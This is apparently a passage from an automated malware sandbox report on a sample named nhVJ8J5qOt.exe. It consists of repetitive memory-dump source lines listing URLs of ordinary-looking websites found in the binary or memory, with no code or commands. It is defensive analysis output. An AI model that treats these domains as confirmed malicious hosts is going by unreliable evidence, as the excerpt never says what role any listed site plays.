00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/T
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/W
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/tro
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/-
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/563209-4053062332-1002
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.comg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/$
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/&3
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/N3
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.0000000007697000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.pl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pohlfood.com/l
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/D(o
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/dual
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz//
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/m
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/m
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641101813.00000000076E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.co/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/8
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/e
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/lr
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/omma
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.0000000007721000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.railbook.net/bq
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/J
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/V
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.0000000001552000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.00000000076B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rsag.info
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/jq
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/zq
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sjbs.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/m#0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.spanesi.com/1
